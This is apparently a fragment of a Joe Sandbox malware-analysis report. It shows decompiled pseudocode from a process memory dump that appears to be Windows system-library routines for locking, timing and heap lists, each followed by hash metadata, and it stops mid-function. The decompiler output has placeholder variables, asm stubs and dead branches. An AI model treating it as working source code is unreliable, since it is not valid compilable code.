                            C-Code - Quality: 86%
                            			E0388AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                            				signed int _v8;
                            				signed int _v12;
                            				void* __esi;
                            				void* __ebp;
                            				signed short* _t36;
                            				signed int _t41;
                            				char* _t42;
                            				intOrPtr _t43;
                            				signed int _t47;
                            				void* _t52;
                            				signed int _t57;
                            				intOrPtr _t61;
                            				signed char _t62;
                            				signed int _t72;
                            				signed char _t85;
                            				signed int _t88;
                            
                            				_t73 = __edx;
                            				_push(__ecx);
                            				_t85 = __ecx;
                            				_v8 = __edx;
                            				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                            				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                            				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                            					_t57 = _t57 | 0x00000001;
                            				}
                            				_t88 = 0;
                            				_t36 = 0;
                            				_t96 = _a12;
                            				if(_a12 == 0) {
                            					_t62 = _a8;
                            					__eflags = _t62;
                            					if(__eflags == 0) {
                            						goto L12;
                            					}
                            					_t52 = E0388C38B(_t85, _t73, _t57, 0);
                            					_t62 = _a8;
                            					 *_t62 = _t52;
                            					_t36 = 0;
                            					goto L11;
                            				} else {
                            					_t36 = E0388ACFD(_t85, _t73, _t96, _t57, _a8);
                            					if(0 == 0 || 0 == 0xffffffff) {
                            						_t72 = _t88;
                            					} else {
                            						_t72 =  *0x00000000 & 0x0000ffff;
                            					}
                            					 *_a12 = _t72;
                            					_t62 = _a8;
                            					L11:
                            					_t73 = _v8;
                            					L12:
                            					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                            						L19:
                            						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                            							L22:
                            							_t74 = _v8;
                            							__eflags = _v8;
                            							if(__eflags != 0) {
                            								L25:
                            								__eflags = _t88 - 2;
                            								if(_t88 != 2) {
                            									__eflags = _t85 + 0x44 + (_t88 << 6);
                            									_t88 = E0388FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                            									goto L34;
                            								}
                            								L26:
                            								_t59 = _v8;
                            								E0388EA55(_t85, _v8, _t57);
                            								asm("sbb esi, esi");
                            								_t88 =  ~_t88;
                            								_t41 = E037E7D50();
                            								__eflags = _t41;
                            								if(_t41 == 0) {
                            									_t42 = 0x7ffe0380;
                            								} else {
                            									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            								}
                            								__eflags =  *_t42;
                            								if( *_t42 != 0) {
                            									_t43 =  *[fs:0x30];
                            									__eflags =  *(_t43 + 0x240) & 0x00000001;
                            									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                            										__eflags = _t88;
                            										if(_t88 != 0) {
                            											E03881608(_t85, _t59, 3);
                            										}
                            									}
                            								}
                            								goto L34;
                            							}
                            							_push(_t62);
                            							_t47 = E03891536(0x38b8ae4, (_t74 -  *0x38b8b04 >> 0x14) + (_t74 -  *0x38b8b04 >> 0x14), _t88, __eflags);
                            							__eflags = _t47;
                            							if(_t47 == 0) {
                            								goto L26;
                            							}
                            							_t74 = _v12;
                            							_t27 = _t47 - 1; // -1
                            							_t88 = _t27;
                            							goto L25;
                            						}
                            						_t62 = _t85;
                            						if(L0388C323(_t62, _v8, _t57) != 0xffffffff) {
                            							goto L22;
                            						}
                            						_push(_t62);
                            						_push(_t88);
                            						E0388A80D(_t85, 9, _v8, _t88);
                            						goto L34;
                            					} else {
                            						_t101 = _t36;
                            						if(_t36 != 0) {
                            							L16:
                            							if(_t36 == 0xffffffff) {
                            								goto L19;
                            							}
                            							_t62 =  *((intOrPtr*)(_t36 + 2));
                            							if((_t62 & 0x0000000f) == 0) {
                            								goto L19;
                            							}
                            							_t62 = _t62 & 0xf;
                            							if(E0386CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                            								L34:
                            								return _t88;
                            							}
                            							goto L19;
                            						}
                            						_t62 = _t85;
                            						_t36 = E0388ACFD(_t62, _t73, _t101, _t57, _t62);
                            						if(_t36 == 0) {
                            							goto L19;
                            						}
                            						goto L16;
                            					}
                            				}
                            			}


                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4062d5c8cabcaecd8a36bf457dfde64f91c8f14738c7fdfe5c7d82a580d787ec
                            • Instruction ID: f8beb6eb218f74589424259d4e73839ae3d52e6caf5ade3b8f11a70dd3c18539
                            • Opcode Fuzzy Hash: 4062d5c8cabcaecd8a36bf457dfde64f91c8f14738c7fdfe5c7d82a580d787ec
                            • Instruction Fuzzy Hash: 3B41F8717007159BDB2DEBA9C884B3BF399EF84610F0C469AF856CB2D0D738D801C691
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E037EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				char _v5;
                            				signed int _v12;
                            				signed int* _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t54;
                            				char* _t58;
                            				signed int _t66;
                            				intOrPtr _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t72;
                            				intOrPtr _t73;
                            				signed int* _t75;
                            				intOrPtr _t79;
                            				intOrPtr _t80;
                            				char _t82;
                            				signed int _t83;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t89;
                            				intOrPtr _t90;
                            				intOrPtr _t92;
                            				signed int _t97;
                            				intOrPtr _t98;
                            				intOrPtr* _t99;
                            				signed int* _t101;
                            				signed int* _t102;
                            				intOrPtr* _t103;
                            				intOrPtr _t105;
                            				signed int _t106;
                            				void* _t118;
                            
                            				_t92 = __edx;
                            				_t75 = _a4;
                            				_t98 = __ecx;
                            				_v44 = __edx;
                            				_t106 = _t75[1];
                            				_v40 = __ecx;
                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                            					_t82 = 0;
                            				} else {
                            					_t82 = 1;
                            				}
                            				_v5 = _t82;
                            				_t6 = _t98 + 0xc8; // 0xc9
                            				_t101 = _t6;
                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                            				if(_t82 != 0) {
                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                            					_t83 =  *_t75;
                            					_t54 = _t75[1];
                            					 *_t101 = _t83;
                            					_t84 = _t83 | _t54;
                            					_t101[1] = _t54;
                            					if(_t84 == 0) {
                            						_t101[1] = _t101[1] & _t84;
                            						 *_t101 = 1;
                            					}
                            					goto L19;
                            				} else {
                            					if(_t101 == 0) {
                            						E037CCC50(E037C4510(0xc000000d));
                            						_t88 =  *_t101;
                            						_t97 = _t101[1];
                            						L15:
                            						_v12 = _t88;
                            						_t66 = _t88 -  *_t75;
                            						_t89 = _t97;
                            						asm("sbb ecx, [ebx+0x4]");
                            						_t118 = _t89 - _t97;
                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                            							_t66 = _t66 | 0xffffffff;
                            							_t89 = 0x7fffffff;
                            						}
                            						 *_t101 = _t66;
                            						_t101[1] = _t89;
                            						L19:
                            						if(E037E7D50() != 0) {
                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            						} else {
                            							_t58 = 0x7ffe0386;
                            						}
                            						_t102 = _v16;
                            						if( *_t58 != 0) {
                            							_t58 = E03898ED6(_t102, _t98);
                            						}
                            						_t76 = _v44;
                            						E037E2280(_t58, _v44);
                            						E037EDD82(_v44, _t102, _t98);
                            						E037EB944(_t102, _v5);
                            						return E037DFFB0(_t76, _t98, _t76);
                            					}
                            					_t99 = 0x7ffe03b0;
                            					do {
                            						_t103 = 0x7ffe0010;
                            						do {
                            							_t67 =  *0x38b8628; // 0x0
                            							_v28 = _t67;
                            							_t68 =  *0x38b862c; // 0x0
                            							_v32 = _t68;
                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                            							_v20 =  *_t99;
                            							while(1) {
                            								_t97 =  *0x7ffe000c;
                            								_t90 =  *0x7FFE0008;
                            								if(_t97 ==  *_t103) {
                            									goto L10;
                            								}
                            								asm("pause");
                            							}
                            							L10:
                            							_t79 = _v24;
                            							_t99 = 0x7ffe03b0;
                            							_v12 =  *0x7ffe03b0;
                            							_t72 =  *0x7FFE03B4;
                            							_t103 = 0x7ffe0010;
                            							_v36 = _t72;
                            						} while (_v20 != _v12 || _t79 != _t72);
                            						_t73 =  *0x38b8628; // 0x0
                            						_t105 = _v28;
                            						_t80 =  *0x38b862c; // 0x0
                            					} while (_t105 != _t73 || _v32 != _t80);
                            					_t98 = _v40;
                            					asm("sbb edx, [ebp-0x20]");
                            					_t88 = _t90 - _v12 - _t105;
                            					_t75 = _a4;
                            					asm("sbb edx, eax");
                            					_t31 = _t98 + 0xc8; // 0x388fb53
                            					_t101 = _t31;
                            					 *_t101 = _t88;
                            					_t101[1] = _t97;
                            					goto L15;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 413f7e9a33c12d7fa3302afa4b1a4e669ac946615970c314809b23b6709f8c79
                            • Instruction ID: 08342969daf7198d7f3821f860c0f1a43eb907e0fbd92682c89428b603b7992a
                            • Opcode Fuzzy Hash: 413f7e9a33c12d7fa3302afa4b1a4e669ac946615970c314809b23b6709f8c79
                            • Instruction Fuzzy Hash: 6F51BE75A00655CFCB24DFA8C490AAEFBF5BF4D350F24819AD955EB340EB70A944CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E037DEF40(intOrPtr __ecx) {
                            				char _v5;
                            				char _v6;
                            				char _v7;
                            				char _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr _t58;
                            				char _t59;
                            				signed char _t69;
                            				void* _t73;
                            				signed int _t74;
                            				char _t79;
                            				signed char _t81;
                            				signed int _t85;
                            				signed int _t87;
                            				intOrPtr _t90;
                            				signed char* _t91;
                            				void* _t92;
                            				signed int _t94;
                            				void* _t96;
                            
                            				_t90 = __ecx;
                            				_v16 = __ecx;
                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                            					_t58 =  *((intOrPtr*)(__ecx));
                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                            						E037C9080(_t73, __ecx, __ecx, _t92);
                            					}
                            				}
                            				_t74 = 0;
                            				_t96 =  *0x7ffe036a - 1;
                            				_v12 = 0;
                            				_v7 = 0;
                            				if(_t96 > 0) {
                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                            					_v12 = _t74;
                            					_v7 = _t96 != 0;
                            				}
                            				_t79 = 0;
                            				_v8 = 0;
                            				_v5 = 0;
                            				while(1) {
                            					L4:
                            					_t59 = 1;
                            					L5:
                            					while(1) {
                            						if(_t59 == 0) {
                            							L12:
                            							_t21 = _t90 + 4; // 0x77cdc21e
                            							_t87 =  *_t21;
                            							_v6 = 0;
                            							if(_t79 != 0) {
                            								if((_t87 & 0x00000002) != 0) {
                            									goto L19;
                            								}
                            								if((_t87 & 0x00000001) != 0) {
                            									_v6 = 1;
                            									_t74 = _t87 ^ 0x00000003;
                            								} else {
                            									_t51 = _t87 - 2; // -2
                            									_t74 = _t51;
                            								}
                            								goto L15;
                            							} else {
                            								if((_t87 & 0x00000001) != 0) {
                            									_v6 = 1;
                            									_t74 = _t87 ^ 0x00000001;
                            								} else {
                            									_t26 = _t87 - 4; // -4
                            									_t74 = _t26;
                            									if((_t74 & 0x00000002) == 0) {
                            										_t74 = _t74 - 2;
                            									}
                            								}
                            								L15:
                            								if(_t74 == _t87) {
                            									L19:
                            									E037C2D8A(_t74, _t90, _t87, _t90);
                            									_t74 = _v12;
                            									_v8 = 1;
                            									if(_v7 != 0 && _t74 > 0x64) {
                            										_t74 = _t74 - 1;
                            										_v12 = _t74;
                            									}
                            									_t79 = _v5;
                            									goto L4;
                            								}
                            								asm("lock cmpxchg [esi], ecx");
                            								if(_t87 != _t87) {
                            									_t74 = _v12;
                            									_t59 = 0;
                            									_t79 = _v5;
                            									continue;
                            								}
                            								if(_v6 != 0) {
                            									_t74 = _v12;
                            									L25:
                            									if(_v7 != 0) {
                            										if(_t74 < 0x7d0) {
                            											if(_v8 == 0) {
                            												_t74 = _t74 + 1;
                            											}
                            										}
                            										_t38 = _t90 + 0x14; // 0x0
                            										_t39 = _t90 + 0x14; // 0x0
                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                            											_t85 = _t85 & 0xff000000;
                            										}
                            										 *(_t90 + 0x14) = _t85;
                            									}
                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                            									return 0;
                            								}
                            								_v5 = 1;
                            								_t87 = _t74;
                            								goto L19;
                            							}
                            						}
                            						_t94 = _t74;
                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                            						if(_t74 == 0) {
                            							goto L12;
                            						} else {
                            							_t91 = _t90 + 4;
                            							goto L8;
                            							L9:
                            							while((_t81 & 0x00000001) != 0) {
                            								_t69 = _t81;
                            								asm("lock cmpxchg [edi], edx");
                            								if(_t69 != _t81) {
                            									_t81 = _t69;
                            									continue;
                            								}
                            								_t90 = _v16;
                            								goto L25;
                            							}
                            							asm("pause");
                            							_t94 = _t94 - 1;
                            							if(_t94 != 0) {
                            								L8:
                            								_t81 =  *_t91;
                            								goto L9;
                            							} else {
                            								_t90 = _v16;
                            								_t79 = _v5;
                            								goto L12;
                            							}
                            						}
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                            • Instruction ID: 41543d4aa7db3deec2f10ba5a3e9d147bcebc55dcb085bd3c0fd00520daa51ae
                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                            • Instruction Fuzzy Hash: A3510030E04249EFDB22CB68D1D07AEFBB1AF05314F1C81E8D4469B281C376A989D791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E0389740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                            				signed short* _v8;
                            				intOrPtr _v12;
                            				intOrPtr _t55;
                            				void* _t56;
                            				intOrPtr* _t66;
                            				intOrPtr* _t69;
                            				void* _t74;
                            				intOrPtr* _t78;
                            				intOrPtr* _t81;
                            				intOrPtr* _t82;
                            				intOrPtr _t83;
                            				signed short* _t84;
                            				intOrPtr _t85;
                            				signed int _t87;
                            				intOrPtr* _t90;
                            				intOrPtr* _t93;
                            				intOrPtr* _t94;
                            				void* _t98;
                            
                            				_t84 = __edx;
                            				_t80 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t55 = __ecx;
                            				_v8 = __edx;
                            				_t87 =  *__edx & 0x0000ffff;
                            				_v12 = __ecx;
                            				_t3 = _t55 + 0x154; // 0x154
                            				_t93 = _t3;
                            				_t78 =  *_t93;
                            				_t4 = _t87 + 2; // 0x2
                            				_t56 = _t4;
                            				while(_t78 != _t93) {
                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                            						L4:
                            						_t78 =  *_t78;
                            						continue;
                            					} else {
                            						_t7 = _t78 + 0x18; // 0x18
                            						if(E0381D4F0(_t7, _t84[2], _t87) == _t87) {
                            							_t40 = _t78 + 0xc; // 0xc
                            							_t94 = _t40;
                            							_t90 =  *_t94;
                            							while(_t90 != _t94) {
                            								_t41 = _t90 + 8; // 0x8
                            								_t74 = E0380F380(_a4, _t41, 0x10);
                            								_t98 = _t98 + 0xc;
                            								if(_t74 != 0) {
                            									_t90 =  *_t90;
                            									continue;
                            								}
                            								goto L12;
                            							}
                            							_t82 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                            							if(_t82 != 0) {
                            								_t46 = _t78 + 0xc; // 0xc
                            								_t69 = _t46;
                            								asm("movsd");
                            								asm("movsd");
                            								asm("movsd");
                            								asm("movsd");
                            								_t85 =  *_t69;
                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                            									L20:
                            									_t82 = 3;
                            									asm("int 0x29");
                            								}
                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                            								 *_t82 = _t85;
                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                            								 *_t69 = _t82;
                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                            								goto L11;
                            							} else {
                            								L18:
                            								_push(0xe);
                            								_pop(0);
                            							}
                            						} else {
                            							_t84 = _v8;
                            							_t9 = _t87 + 2; // 0x2
                            							_t56 = _t9;
                            							goto L4;
                            						}
                            					}
                            					L12:
                            					return 0;
                            				}
                            				_t10 = _t87 + 0x1a; // 0x1a
                            				_t78 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                            				if(_t78 == 0) {
                            					goto L18;
                            				} else {
                            					_t12 = _t87 + 2; // 0x2
                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                            					_t16 = _t78 + 0x18; // 0x18
                            					E0380F3E0(_t16, _v8[2], _t87);
                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                            					_t19 = _t78 + 0xc; // 0xc
                            					_t66 = _t19;
                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                            					 *_t66 = _t66;
                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                            					_t81 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                            					if(_t81 == 0) {
                            						goto L18;
                            					} else {
                            						_t26 = _t78 + 0xc; // 0xc
                            						_t69 = _t26;
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						_t85 =  *_t69;
                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                            							goto L20;
                            						} else {
                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                            							 *_t81 = _t85;
                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                            							 *_t69 = _t81;
                            							_t83 = _v12;
                            							 *(_t78 + 8) = 1;
                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                            							_t34 = _t83 + 0x154; // 0x1ba
                            							_t69 = _t34;
                            							_t85 =  *_t69;
                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                            								goto L20;
                            							} else {
                            								 *_t78 = _t85;
                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                            								 *_t69 = _t78;
                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                            							}
                            						}
                            						goto L11;
                            					}
                            				}
                            				goto L12;
                            			}






















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                            • Instruction ID: 26f4a5116d55258527b8894316783ffd13200310ebe4cdd1861a8d1c24b04fdf
                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                            • Instruction Fuzzy Hash: 30515971600606EFDB55CF94C880A96BBB9FF45304F19C1EAE908DF252E371EA46CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E037F2990() {
                            				signed int* _t62;
                            				signed int _t64;
                            				intOrPtr _t66;
                            				signed short* _t69;
                            				intOrPtr _t76;
                            				signed short* _t79;
                            				void* _t81;
                            				signed int _t82;
                            				signed short* _t83;
                            				signed int _t87;
                            				intOrPtr _t91;
                            				void* _t98;
                            				signed int _t99;
                            				void* _t101;
                            				signed int* _t102;
                            				void* _t103;
                            				void* _t104;
                            				void* _t107;
                            
                            				_push(0x20);
                            				_push(0x389ff00);
                            				E0381D08C(_t81, _t98, _t101);
                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                            				_t99 = 0;
                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                            				if(_t82 == 0) {
                            					_t62 = 0xc0000100;
                            				} else {
                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                            					_t102 = 0xc0000100;
                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                            					_t64 = 4;
                            					while(1) {
                            						 *(_t103 - 0x24) = _t64;
                            						if(_t64 == 0) {
                            							break;
                            						}
                            						_t87 = _t64 * 0xc;
                            						 *(_t103 - 0x2c) = _t87;
                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x37a1664));
                            						if(_t107 <= 0) {
                            							if(_t107 == 0) {
                            								_t79 = E0380E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x37a1668)), _t82);
                            								_t104 = _t104 + 0xc;
                            								__eflags = _t79;
                            								if(__eflags == 0) {
                            									_t102 = E038451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x37a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                            									break;
                            								} else {
                            									_t64 =  *(_t103 - 0x24);
                            									goto L5;
                            								}
                            								goto L13;
                            							} else {
                            								L5:
                            								_t64 = _t64 - 1;
                            								continue;
                            							}
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            					__eflags = _t102;
                            					if(_t102 < 0) {
                            						__eflags = _t102 - 0xc0000100;
                            						if(_t102 == 0xc0000100) {
                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                            							__eflags = _t83;
                            							if(_t83 != 0) {
                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                            								__eflags =  *_t83 - _t99;
                            								if( *_t83 == _t99) {
                            									_t102 = 0xc0000100;
                            									goto L19;
                            								} else {
                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                            											L26:
                            											_t102 = E037F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            											__eflags = _t102 - 0xc0000100;
                            											if(_t102 != 0xc0000100) {
                            												goto L12;
                            											} else {
                            												_t99 = 1;
                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                            												goto L18;
                            											}
                            										} else {
                            											_t69 = E037D6600( *((intOrPtr*)(_t91 + 0x1c)));
                            											__eflags = _t69;
                            											if(_t69 != 0) {
                            												goto L26;
                            											} else {
                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                            												goto L18;
                            											}
                            										}
                            									} else {
                            										L18:
                            										_t102 = E037F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                            										L19:
                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            										goto L12;
                            									}
                            								}
                            								L28:
                            							} else {
                            								E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                            								_t76 = E037F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                            								__eflags = _t76 - 0xc0000100;
                            								if(_t76 == 0xc0000100) {
                            									 *((intOrPtr*)(_t103 - 0x1c)) = E037F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                            								}
                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                            								E037F2ACB();
                            							}
                            						}
                            					}
                            					L12:
                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                            					_t62 = _t102;
                            				}
                            				L13:
                            				return E0381D0D1(_t62);
                            				goto L28;
                            			}






















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e946c6984a60cd8fca703fe3a5e1abce3336c74717102e39e367472650746bfa
                            • Instruction ID: b0898483041b6e1e1092cdf29fbaaf4615a39c50420371cba24e986bcabd2211
                            • Opcode Fuzzy Hash: e946c6984a60cd8fca703fe3a5e1abce3336c74717102e39e367472650746bfa
                            • Instruction Fuzzy Hash: BD517A79900209EFDF25DF95C880ADEBBB5BF48314F088595EE10AB361C7359952DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E037F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                            				signed int _v8;
                            				short _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				char _v36;
                            				char _v156;
                            				short _v158;
                            				intOrPtr _v160;
                            				char _v164;
                            				intOrPtr _v168;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t45;
                            				intOrPtr _t74;
                            				signed char _t77;
                            				intOrPtr _t84;
                            				char* _t85;
                            				void* _t86;
                            				intOrPtr _t87;
                            				signed short _t88;
                            				signed int _t89;
                            
                            				_t83 = __edx;
                            				_v8 =  *0x38bd360 ^ _t89;
                            				_t45 = _a8 & 0x0000ffff;
                            				_v158 = __edx;
                            				_v168 = __ecx;
                            				if(_t45 == 0) {
                            					L22:
                            					_t86 = 6;
                            					L12:
                            					E037CCC50(_t86);
                            					L11:
                            					return E0380B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                            				}
                            				_t77 = _a4;
                            				if((_t77 & 0x00000001) != 0) {
                            					goto L22;
                            				}
